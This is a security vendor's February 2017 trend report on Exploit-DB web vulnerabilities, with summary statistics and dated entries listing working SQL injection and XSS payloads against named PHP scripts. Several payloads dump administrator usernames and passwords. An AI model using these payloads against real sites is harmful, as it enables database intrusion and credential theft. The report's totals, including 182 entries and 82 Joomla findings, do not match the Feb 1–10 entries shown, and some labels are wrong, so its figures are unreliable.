2017.02
1. Vulnerabilities by category
Category | Count
Cross-site scripting (XSS) | 2
SQL injection | 180
Total | 182

2. Vulnerabilities by severity
Severity | Count | Share
High | 19 | 10.44%
Medium | 163 | 89.56%
Total | 182 | 100.00%

3. Vulnerabilities by attack difficulty
Difficulty | Count | Share
Hard | 19 | 10.44%
Medium | 26 | 14.29%
Easy | 137 | 75.27%
Total | 182 | 100.00%

4. Vulnerabilities by major software
Software | Count
Joomla | 82
Itech B2B Script | 5
Alstrasoft Video Share Enterprise | 4
Viavi | 4
Itech Movie Portal Script | 4
Itech Travel Portal Script | 4
WordPress | 3
Visual Link Sharing Websites Builder Script | 3
Easy Support Tools | 3
TI Online Examination System | 3
Itech Job Portal Script | 3
Alstrasoft EPay Enterprise | 3
ThisIsWhyImBroke Clone Script | 2
Quadz School Management System | 2
Domains & Hostings Manager PRO | 2
Itech Multi Vendor Script | 2
Ultimate Viral Media Script | 2
Zoneminder | 2
Automated Job Portal Script | 2
Easy Web Search | 2
CMS Lite | 1
EXAMPLO | 1
Itech Auction Script | 1
iScripts AutoHoster | 1
Uploadr | 1
Viral Fun Facts Sharing Script | 1
Takas Classified | 1
Property Listing Script | 1
PHP Marketplace Script | 1
Itech Inventory Management Software | 1
Video Subscription | 1
Itech News Portal Script | 1
LogoStore | 1
Upworthy Clone Script | 1
Gram Post | 1
Funny Image and Video Script | 1
Multilanguage Estate Agency Pro | 1
Clone Script Directory Script | 1
Alstrasoft Forum Pay Per Post Exchange Script | 1
Viral Pictures and Video Script | 1
Alstrasoft Template Seller Pro | 1
NewsBee CMS | 1
HotelCMS with Booking Engine | 1
Web Inspiration Gallery Script | 1
CodePaul ClipMass | 1
SlimarUSER Management | 1
CLUB-8 EMS | 1
iScripts EasyCreate | 1
QWIKIA | 1
Fully Featured News CMS | 1
Tiger Post | 1
MySQL File Uploader | 1
Youtube Analytics Multi Channel | 1
Muviko Video CMS | 1
Zigaform | 1
Multi Outlets POS | 1
Questions and Answers Script | 1
Mobiketa | 1
Alstrasoft e-Friends | 1
Sendroid | 1
WhizBiz | 1
Fome SMS Portal | 1
dotCMS | 1
SOA School Management | 1
Client Expert | 1
Total | 182
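EDB-Report: Latest Web Vulnerability Trend Report (2017.02)
Vulnerability trend information based on what was published on Exploit-DB (http://exploit-db.com) from 2017.02.01 to 2017.02.28.

Summary
In February 2017, continuing from January, the number of vulnerability reports published on Exploit-DB was about four times higher than in other periods. Almost all of the vulnerabilities found were related to SQL injection. According to our analysis, most of the attacks were low in difficulty yet high in severity. The attacks varied widely, from queries that simply check whether an attack succeeds to queries that extract actual database data. Administrators who use the affected software need extensive secure coding for input validation so that they are not exposed to SQL injection attacks. In the breakdown by major software, the most vulnerabilities were found in the Joomla CMS. Like WordPress, Joomla is a CMS used by many users. Administrators who use Joomla must check the target program and target environment and update the affected plugins.

Penta Security Systems Inc., R&D Center, Data Security Team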
[Charts: vulnerabilities by category; vulnerabilities by severity; vulnerabilities by attack difficulty; vulnerabilities by major software]
Entry fields: date, EDB number, vulnerability category, attack difficulty, severity, vulnerability name, attack code, target program, target environment

2017-02-01 | EDB 41210 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: LogoStore - search.php SQL Injection vulnerability
Attack code:
  POST /LogoStore/search.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
Target program: LogoStore | Target environment: LogoStore

2017-02-02 | EDB 41230 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Movie Portal Script 7.37 - cms.php SQL Injection vulnerability
Attack code: /cms.php?id=1%20and%201=1--
Target program: Itech Movie Portal Script | Target environment: Itech Movie Portal Script 7.37

2017-02-02 | EDB 41230 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Movie Portal Script 7.37 - show_news.php SQL Injection vulnerability
Attack code: /show_news.php?fid=1%20and%201=1--
Target program: Itech Movie Portal Script | Target environment: Itech Movie Portal Script 7.37

2017-02-02 | EDB 41230 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Movie Portal Script 7.37 - show_misc_video.php SQL Injection vulnerability
Attack code: /show_misc_video.php?fid=1%20and%201=1--
Target program: Itech Movie Portal Script | Target environment: Itech Movie Portal Script 7.37

2017-02-02 | EDB 41231 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Travel Portal Script 9.35 - content.php SQL Injection vulnerability
Attack code: /content.php?id=1%20and%201=1--
Target program: Itech Travel Portal Script | Target environment: Itech Travel Portal Script 9.35

2017-02-02 | EDB 41231 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Travel Portal Script 9.35 - faq_show.php SQL Injection vulnerability
Attack code: /faq_show.php?fid=1%20and%201=1--
Target program: Itech Travel Portal Script | Target environment: Itech Travel Portal Script 9.35

2017-02-02 | EDB 41231 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Travel Portal Script 9.35 - showCity.php SQL Injection vulnerability
Attack code: showCity.php?q=1%20and%201=1--
Target program: Itech Travel Portal Script | Target environment: Itech Travel Portal Script 9.35

2017-02-02 | EDB 41231 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Travel Portal Script 9.35 - pages.php SQL Injection vulnerability
Attack code: /pages.php?id=1%20and%201=1--
Target program: Itech Travel Portal Script | Target environment: Itech Travel Portal Script 9.35

2017-02-02 | EDB 41225 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Property Listing Script - property_view.php SQL Injection vulnerability
Attack code: /property_view.php?propid=443' AND SLEEP(5) AND 'FBop'='FBop
Target program: Property Listing Script | Target environment: Property Listing Script

2017-02-02 | EDB 41226 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Inventory Management Software 3.77 - notice-edit.php SQL Injection vulnerability
Attack code: /notice-edit.php?aid=1%20and%201=1--
Target program: Itech Inventory Management Software | Target environment: Itech Inventory Management Software 3.77

2017-02-02 | EDB 41230 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Movie Portal Script 7.37 - faq_show.php SQL Injection vulnerability
Attack code: /faq_show.php?fid=1%20and%201=1--
Target program: Itech Movie Portal Script | Target environment: Itech Movie Portal Script 7.37

2017-02-02 | EDB 41228 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech News Portal Script 6.28 - subcategory.php SQL Injection vulnerability
Attack code: /subcategory.php?sc=1%20and%201=1--
Target program: Itech News Portal Script | Target environment: Itech News Portal Script 6.28

2017-02-02 | EDB 41229 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Auction Script 6.49 - list_photo.php SQL Injection vulnerability
Attack code: /ajax-files/list_photo.php?pid=1%20and%201=1--
Target program: Itech Auction Script | Target environment: Itech Auction Script 6.49

2017-02-03 | EDB 41239 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Zoneminder 1.29 / 1.30 - index.php SQL Injection vulnerability
Attack code:
  POST /index.php HTTP/1.1
  Host:
  User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7
  Accept: */*
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  view=request&request=log&task=query&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Target program: Zoneminder | Target environment: Zoneminder 1.29 / 1.30

2017-02-03 | EDB 41238 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Multi Vendor Script 6.49 - product.php SQL Injection vulnerability
Attack code: /product.php?id=id=9 AND 9693=9693
Target program: Itech Multi Vendor Script | Target environment: Itech Multi Vendor Script 6.49

2017-02-03 | EDB 41235 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: SlimarUSER Management 1.0 - 'id' Parameter SQL Injection
Attack code: /userman/inbox.php?p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF
Target program: SlimarUSER Management | Target environment: SlimarUSER Management 1.0

2017-02-03 | EDB 41238 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Multi Vendor Script 6.49 - quickview.php SQL Injection vulnerability
Attack code: /quickview.php?id=10%20and%209776=9776
Target program: Itech Multi Vendor Script | Target environment: Itech Multi Vendor Script 6.49

2017-02-03 | EDB 41239 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Zoneminder 1.29 / 1.30 - index.php XSS vulnerability
Attack code: /index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
Target program: Zoneminder | Target environment: Zoneminder 1.29 / 1.30
2017-02-04 | EDB 41252 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: iScripts EasyCreate 3.2 - getsitedetails.php SQL Injection vulnerability
Attack code: /getsitedetails.php?action=editsite&siteid=1%20and%201=1--
Target program: iScripts EasyCreate | Target environment: iScripts EasyCreate 3.2

2017-02-04 | EDB 41250 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Itech Job Portal Script 9.13 - news_details_us.php SQL Injection vulnerability
Attack code: /news_details_us.php?nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
Target program: Itech Job Portal Script | Target environment: Itech Job Portal Script 9.13

2017-02-04 | EDB 41250 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Job Portal Script 9.13 - search_result_alluser.php XSS vulnerability
Attack code: /search_result_alluser.php?function="><svg/onload=prompt('CT-Zer0');>
Target program: Itech Job Portal Script | Target environment: Itech Job Portal Script 9.13

2017-02-04 | EDB 41244 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft Video Share Enterprise 4.72 - uprofile.php SQL Injection vulnerability
Attack code: /uprofile.php?UID=1%20and%201=1--
Target program: Alstrasoft Video Share Enterprise | Target environment: Alstrasoft Video Share Enterprise 4.72

2017-02-04 | EDB 41244 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft Video Share Enterprise 4.72 - gmembers.php SQL Injection vulnerability
Attack code: /gmembers.php?urlkey=1&gid=1%20and%201=1--
Target program: Alstrasoft Video Share Enterprise | Target environment: Alstrasoft Video Share Enterprise 4.72

2017-02-04 | EDB 41244 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft Video Share Enterprise 4.72 - channel_detail.php SQL Injection vulnerability
Attack code: /channel_detail.php?chid=1%20and%201=1--
Target program: Alstrasoft Video Share Enterprise | Target environment: Alstrasoft Video Share Enterprise 4.72

2017-02-04 | EDB 41241 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft EPay Enterprise 5.17 - products.htm SQL Injection vulnerability
Attack code: /members/products.htm?id=1%20and%201=1--&action=update
Target program: Alstrasoft EPay Enterprise | Target environment: Alstrasoft EPay Enterprise 5.17

2017-02-04 | EDB 41241 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft EPay Enterprise 5.17 - subscriptions.htm SQL Injection vulnerability
Attack code: /members/subscriptions.htm?id=1%20and%201=1--&action=update
Target program: Alstrasoft EPay Enterprise | Target environment: Alstrasoft EPay Enterprise 5.17

2017-02-04 | EDB 41241 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft EPay Enterprise 5.17 - userinfo.htm SQL Injection vulnerability
Attack code: /members/userinfo.htm?id=1%20and%201=1--
Target program: Alstrasoft EPay Enterprise | Target environment: Alstrasoft EPay Enterprise 5.17

2017-02-04 | EDB 41243 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft e-Friends 5.12 - index.php SQL Injection vulnerability
Attack code: /index.php?mode=forums&act=viewcat&seid=1%20and%201=1--
Target program: Alstrasoft e-Friends | Target environment: Alstrasoft e-Friends 5.12

2017-02-04 | EDB 41244 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft Video Share Enterprise 4.72 - album.php SQL Injection vulnerability
Attack code: /album.php?UID=1%20and%201=1--
Target program: Alstrasoft Video Share Enterprise | Target environment: Alstrasoft Video Share Enterprise 4.72

2017-02-04 | EDB 41247 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Alstrasoft Forum Pay Per Post Exchange Script 2.01 - index.php SQL Injection vulnerability
Attack code: /index.php?menu=forum_catview&catid=1%20and%201=1--
Target program: Alstrasoft Forum Pay Per Post Exchange Script | Target environment: Alstrasoft Forum Pay Per Post Exchange Script 2.01

2017-02-04 | EDB 41249 | SQL Injection | Difficulty: Hard | Severity: High
Name: Alstrasoft Template Seller Pro 3.25e - buy.php SQL Injection vulnerability
Attack code: /buy.php?tempid=-1+union+select+1,2,3,4,5,6,7,8+from/**/table+--+"
Target program: Alstrasoft Template Seller Pro | Target environment: Alstrasoft Template Seller Pro 3.25e

2017-02-04 | EDB 41250 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Itech Job Portal Script 9.13 - career_advice_details.php SQL Injection vulnerability
Attack code: /career_advice_details.php?cid=5%27%20AND%207504=7504-- zpmu
Target program: Itech Job Portal Script | Target environment: Itech Job Portal Script 9.13

2017-02-04 | EDB 41251 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: iScripts AutoHoster 3.0 - getsitedetails.php SQL Injection vulnerability
Attack code: /websitebuilder/getsitedetails.php?action=editsite&siteid=1%20and%201=1--
Target program: iScripts AutoHoster | Target environment: iScripts AutoHoster 3.0

2017-02-06 | EDB 41264 | SQL Injection | Difficulty: Hard | Severity: High
Name: Questions and Answers Script 2.0.0 - category.php SQL Injection vulnerability
Attack code: /category.php?cid=-9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,adminuser,0x3a,adminpassword),14,15,16,17,18,19,20,21,23+from+admin-- -
Target program: Questions and Answers Script | Target environment: Questions and Answers Script 2.0.0

2017-02-06 | EDB 41263 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Viral Fun Facts Sharing Script 1.1.0 - fact.php SQL Injection vulnerability
Attack code: /fact.php?id=1%20and%201=1--
Target program: Viral Fun Facts Sharing Script | Target environment: Viral Fun Facts Sharing Script 1.1.0

2017-02-06 | EDB 41256 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Visual Link Sharing Websites Builder Script 2.1.0 - cat.php SQL Injection vulnerability
Attack code: /cat.php?id=-9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,adminuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+admin--
Target program: Visual Link Sharing Websites Builder Script | Target environment: Visual Link Sharing Websites Builder Script 2.1.0

2017-02-06 | EDB 41256 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Visual Link Sharing Websites Builder Script 2.1.0 - user_posts.php SQL Injection vulnerability
Attack code: /user_posts.php?id=-9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,adminuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+admin--
Target program: Visual Link Sharing Websites Builder Script | Target environment: Visual Link Sharing Websites Builder Script 2.1.0

2017-02-06 | EDB 41255 | SQL Injection | Difficulty: Hard | Severity: High
Name: Ultimate Viral Media Script 1.0 - picture.php SQL Injection vulnerability
Attack code: /picture.php?id=9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword,0x3c62723e494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,15,16+from+admin--
Target program: Ultimate Viral Media Script | Target environment: Ultimate Viral Media Script 1.0

2017-02-06 | EDB 41253 | SQL Injection | Difficulty: Hard | Severity: High
Name: ThisIsWhyImBroke Clone Script 4.0 - listing.php SQL Injection vulnerability
Attack code: /listing.php?id=-21+/*!50000union*/+select+1,version(),3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,16,17
Target program: ThisIsWhyImBroke Clone Script | Target environment: ThisIsWhyImBroke Clone Script 4.0
2017-02-06 | EDB 41254 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Upworthy Clone Script 1.1.0 - post.php SQL Injection vulnerability
Attack code: /post.php?id=-267+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
Target program: Upworthy Clone Script | Target environment: Upworthy Clone Script 1.1.0

2017-02-06 | EDB 41255 | SQL Injection | Difficulty: Hard | Severity: High
Name: Ultimate Viral Media Script 1.0 - video.php SQL Injection vulnerability
Attack code: /video.php?id=9999+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword,0x3c62723e494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574),3,4,5,6,7,0x564552204159415249203a29,9,10,11,12,13,14,15,16+from+admin--
Target program: Ultimate Viral Media Script | Target environment: Ultimate Viral Media Script 1.0

2017-02-06 | EDB 41256 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Visual Link Sharing Websites Builder Script 2.1.0 - profile.php SQL Injection vulnerability
Attack code: /profile.php?id=-9999+/*!50000union*/+select+1,2,3,4,concat_ws(0x3a,adminuser,0x3a,adminpassword),6,7,8,9,10,11,12,13,14,15+from+admin--
Target program: Visual Link Sharing Websites Builder Script | Target environment: Visual Link Sharing Websites Builder Script 2.1.0

2017-02-06 | EDB 41257 | SQL Injection | Difficulty: Hard | Severity: High
Name: ThisIsWhyImBroke Clone Script 4.0.0 - listing.php SQL Injection vulnerability
Attack code: /listing.php?id=-21+/*!50000union*/+select+1,version(),3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6,7,8,9,10,11,12,14,15,16,17
Target program: ThisIsWhyImBroke Clone Script | Target environment: ThisIsWhyImBroke Clone Script 4.0.0

2017-02-06 | EDB 41258 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Funny Image and Video Script 2.0.0 - post.php SQL Injection vulnerability
Attack code: /post.php?id=-9999+/*!50000union*/+select+concat_ws(0x3a,adminuser,0x3a,adminpassword),2,3,4,5,6,7,8,9,10,11+from+admin--
Target program: Funny Image and Video Script | Target environment: Funny Image and Video Script 2.0.0

2017-02-06 | EDB 41259 | SQL Injection | Difficulty: Hard | Severity: High
Name: Clone Script Directory Script 1.1.0 - cat.php SQL Injection vulnerability
Attack code: /cat.php?cid=-9999'+/*!50000union*/+select+1,concat_ws(0x3a,adminuser,0x3a,adminpassword),3,4,0x494853414e2053454e43414e3c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admin-- -
Target program: Clone Script Directory Script | Target environment: Clone Script Directory Script 1.1.0

2017-02-06 | EDB 41260 | SQL Injection | Difficulty: Hard | Severity: High
Name: Viral Pictures and Video Script 2.0.0 - picture.php SQL Injection vulnerability
Attack code: /picture.php?id=7-9999+/*!50000union*/+select+1,2,concat_ws(0x3a,adminuser,0x3a,adminpassword),4,5,6,7,8+from+admin-- -
Target program: Viral Pictures and Video Script | Target environment: Viral Pictures and Video Script 2.0.0

2017-02-06 | EDB 41261 | SQL Injection | Difficulty: Hard | Severity: High
Name: NewsBee CMS - /newsbee/ SQL Injection vulnerability
Attack code: /newsbee/30' AND (SELECT 4020 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html
Target program: NewsBee CMS | Target environment: NewsBee CMS

2017-02-06 | EDB 41262 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Web Inspiration Gallery Script 1.0.0 - site.php SQL Injection vulnerability
Attack code: /site.php?id=-9999+/*!50000union*/+select+concat_ws(0x3a,username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+administrator--
Target program: Web Inspiration Gallery Script | Target environment: Web Inspiration Gallery Script 1.0.0

2017-02-07 | EDB 41269 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Easy Web Search 3 - all.php SQL Injection vulnerability
Attack code: /all.php?q=&stt=99999'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Easy Web Search | Target environment: Easy Web Search 3

2017-02-07 | EDB 41268 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Easy Support Tools 1.0 - support.php SQL Injection vulnerability
Attack code: /support.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Easy Support Tools | Target environment: Easy Support Tools 1.0

2017-02-07 | EDB 41268 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Easy Support Tools 1.0 - blog.php SQL Injection vulnerability
Attack code: /blog.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Easy Support Tools | Target environment: Easy Support Tools 1.0

2017-02-07 | EDB 41266 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Fully Featured News CMS 1.0 - video.php SQL Injection vulnerability
Attack code: /video.php?id=-9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -
Target program: Fully Featured News CMS | Target environment: Fully Featured News CMS 1.0

2017-02-07 | EDB 41267 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: MySQL File Uploader 1.0 - download.php SQL Injection vulnerability
Attack code: /download.php?id=-9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
Target program: MySQL File Uploader | Target environment: MySQL File Uploader 1.0

2017-02-07 | EDB 41268 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Easy Support Tools 1.0 - faq.php SQL Injection vulnerability
Attack code: /faq.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Easy Support Tools | Target environment: Easy Support Tools 1.0

2017-02-07 | EDB 41269 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Easy Web Search 3 - go.php SQL Injection vulnerability
Attack code: /go.php?id=99999'+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
Target program: Easy Web Search | Target environment: Easy Web Search 3
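2017-02-08 | EDB 41279 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Muviko Video CMS - search.php SQL Injection vulnerability
Attack code: /search.php?q=-9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
Target program: Muviko Video CMS | Target environment: Muviko Video CMS

2017-02-08 | EDB 41280 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Multi Outlets POS 3.1 - / SQL Injection vulnerability
Attack code: /view_invoice?id=1%20and%201=1--
Target program: Multi Outlets POS | Target environment: Multi Outlets POS 3.1

2017-02-09 | EDB 41283 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Mobiketa 3.5 - index.php SQL Injection vulnerability
Attack code: /index.php?url=myCampaign&view=1%20and%201=1--
Target program: Mobiketa | Target environment: Mobiketa 3.5

2017-02-09 | EDB 41284 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Sendroid 5.2 - SQL Injection
Attack code: /Compose.php?msgID=1%20and%201=1--
Target program: Sendroid | Target environment: Sendroid 5.2

2017-02-09 | EDB 41285 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Fome SMS Portal 2.0 - Compose.php SQL Injection vulnerability
Attack code: /Compose.php?draftID=1%20and%201=1--
Target program: Fome SMS Portal | Target environment: Fome SMS Portal 2.0

2017-02-09 | EDB 41286 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: SOA School Management - Document.php SQL Injection vulnerability
Attack code: /Document.php?view=1%20and%201=1--
Target program: SOA School Management | Target environment: SOA School Management

2017-02-09 | EDB 41287 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Client Expert 1.0.1 - index.php SQL Injection vulnerability
Attack code: /index.php?view=ViewInvoice&id=1%20and%201=1--
Target program: Client Expert | Target environment: Client Expert 1.0.1

2017-02-09 | EDB 41288 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: EXAMPLO - index.php SQL Injection vulnerability
Attack code: /index.php?page=exams&action=edit&eid=1%20and%201=1--
Target program: EXAMPLO | Target environment: EXAMPLO

2017-02-10 | EDB 41307 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: HotelCMS with Booking Engine - / SQL Injection vulnerability
Attack code: /locale?locale=1%20and%201=1--
Target program: HotelCMS with Booking Engine | Target environment: HotelCMS with Booking Engine

2017-02-10 | EDB 41306 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Video Subscription - / SQL Injection vulnerability
Attack code: /search?keyword=1%20and%201=1--
Target program: Video Subscription | Target environment: Video Subscription

2017-02-10 | EDB 41305 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: CodePaul ClipMass - / SQL Injection vulnerability
Attack code: /search?keyword=1%20and%201=1--
Target program: CodePaul ClipMass | Target environment: CodePaul ClipMass

2017-02-10 | EDB 41304 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Uploadr - / SQL Injection vulnerability
Attack code: /search?keyword=1%20and%201=1--
Target program: Uploadr | Target environment: Uploadr

2017-02-10 | EDB 41303 | SQL Injection | Difficulty: Hard | Severity: High
Name: CLUB-8 EMS - editwatch.php SQL Injection vulnerability
Attack code: /editwatch.php?id=-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
Target program: CLUB-8 EMS | Target environment: CLUB-8 EMS

2017-02-10 | EDB 41302 | SQL Injection | Difficulty: Hard | Severity: High
Name: Automated Job Portal Script - jobdetail.php SQL Injection vulnerability
Attack code: /jobdetail.php?id=999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
Target program: Automated Job Portal Script | Target environment: Automated Job Portal Script

2017-02-10 | EDB 41302 | SQL Injection | Difficulty: Hard | Severity: High
Name: Automated Job Portal Script - search.php SQL Injection vulnerability
Attack code: /search.php?keyword=1&location=999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
Target program: Automated Job Portal Script | Target environment: Automated Job Portal Script

2017-02-10 | EDB 41301 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: QWIKIA 1.1.1 / SQL Injection vulnerability
Attack code: /search?q=1%20and%201=1--
Target program: QWIKIA | Target environment: QWIKIA 1.1.1

2017-02-10 | EDB 41290 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: CMS Lite 1.3.1 - / SQL Injection vulnerability
Attack code: /?Style=1%20and%201=1--
Target program: CMS Lite | Target environment: CMS Lite 1.3.1

2017-02-10 | EDB 41291 | SQL Injection | Difficulty: Medium | Severity: Medium
Name: Tiger Post 3.0.1 - /index.php/user_management/ SQL Injection vulnerability
Attack code: /index.php/user_management/update?id=999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
Target program: Tiger Post | Target environment: Tiger Post 3.0.1

2017-02-10 | EDB 41292 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Gram Post 1.0 - SQL Injection
Attack code: /index.php/instagram_accounts/update?id=9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
Target program: Gram Post | Target environment: Gram Post 1.0

2017-02-10 | EDB 41293 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Youtube Analytics Multi Channel 3.0 - SQL Injection
Attack code: /index.php/user_management/update?id=1%20and%201=1--
Target program: Youtube Analytics Multi Channel | Target environment: Youtube Analytics Multi Channel 3.0

2017-02-10 | EDB 41295 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Takas Classified 1.1 - SQL Injection vulnerability
Attack code: /index.php/classified_ads/ads/?&subcatid=1%20and%201=1--
Target program: Takas Classified | Target environment: Takas Classified 1.1

2017-02-10 | EDB 41296 | SQL Injection | Difficulty: Easy | Severity: Medium
Name: Zigaform - /formbuilder/frontend/viewform/ SQL Injection vulnerability
Attack code: /formbuilder/frontend/viewform/?form=1%20and%201=1--
Target program: Zigaform | Target environment: Zigaform

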